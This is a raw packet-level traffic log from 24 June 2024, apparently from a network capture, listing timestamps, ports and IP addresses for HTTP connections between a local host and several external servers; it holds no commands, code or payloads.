Jun 24, 2024 00:10:21.744359016 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744370937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744380951 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744393110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744400978 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744411945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744422913 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744425058 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744466066 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744513988 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744668961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744678974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744688988 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744699955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744712114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744721889 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744721889 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744734049 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744745016 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744754076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744760036 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744790077 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744810104 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744811058 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744822979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744833946 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744862080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744893074 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744915009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744926929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744936943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744947910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744959116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744971037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744982004 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744982004 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.745007038 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.745161057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.745172977 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.745182991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.745193958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.745203018 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.745213985 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.745251894 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752175093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752198935 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752208948 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752250910 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752254963 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752291918 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752312899 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752314091 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752326965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752337933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752374887 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752377987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752389908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752403975 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752432108 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752516031 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752527952 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752537966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752549887 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752559900 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752571106 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752578020 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752583027 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752616882 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752649069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752738953 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752749920 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752760887 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752773046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752782106 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752798080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752831936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752831936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752886057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752897024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752907991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752918959 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752931118 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.752939939 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.752973080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.753041983 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.753053904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.753063917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.753103018 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.753135920 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.754405975 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754467010 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.754467964 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754477978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754515886 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.754595041 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754606009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754616976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754627943 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754638910 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.754667044 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.754700899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754710913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754722118 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754731894 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754740953 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754750967 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.754797935 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754810095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.754831076 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.754853010 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755028009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755038023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755049944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755070925 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755095959 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755131006 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755141973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755151987 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755163908 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755182981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755217075 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755309105 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755321026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755331993 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755342007 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755352974 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755357981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755362988 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755373955 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755383015 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755408049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755429983 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755626917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755659103 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755671024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755678892 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755692005 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755716085 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755805969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755816936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755827904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755839109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755851030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755851030 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755892992 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.755961895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755973101 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755983114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.755995035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756005049 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756011009 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756036043 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756055117 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756057024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756105900 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756184101 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756194115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756205082 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756228924 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756266117 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756300926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756311893 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756352901 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756369114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756381035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756414890 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756450891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756463051 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756473064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756489992 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756501913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756505966 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756521940 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756556034 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756603003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756613970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756623030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756634951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756652117 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756675959 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756824017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756834030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756844044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756855965 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756865978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756876945 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756881952 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756889105 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756901026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756910086 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756912947 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.756942034 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.756968975 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757148027 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757158995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757169008 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757179022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757189989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757200003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757201910 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757210970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757221937 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757231951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757240057 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757266045 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757285118 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757363081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757374048 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757411003 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757504940 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757515907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757525921 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757550001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757550955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757561922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757572889 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757572889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757584095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757594109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757605076 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757615089 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757616997 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757627010 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.757656097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.757677078 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.781729937 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:21.793154001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793179989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793191910 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793209076 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.793252945 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.793293953 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793304920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793314934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793327093 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793337107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.793399096 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801292896 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801335096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801336050 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801346064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801371098 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801394939 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801410913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801422119 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801431894 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801445007 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801454067 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801496029 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801587105 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801598072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801608086 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801619053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801628113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801630020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801641941 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801656008 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801681042 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.801706076 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.801745892 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.822345972 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822396040 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822400093 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822406054 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822438002 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822446108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822458982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822468042 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822470903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822500944 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822536945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822546959 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822547913 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822561026 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822590113 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822639942 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822640896 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822653055 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822664976 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822695971 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822730064 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822753906 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822765112 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822776079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822786093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822805882 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822837114 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822860956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822873116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822884083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822895050 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822906017 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.822916031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.822945118 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.823002100 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.823014021 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.823050976 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.823081970 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831398010 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831443071 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831450939 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831454039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831494093 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831526995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831583023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831594944 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831604958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831617117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831629992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831636906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831671953 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831729889 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831742048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831753969 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831765890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831777096 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831784964 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831815958 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831846952 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831888914 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831901073 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831912994 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831923962 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831934929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.831950903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831985950 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.831985950 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832007885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832020998 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832036018 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832046032 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832061052 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832099915 CEST	49726	80	192.168.2.5	185.172.128.116
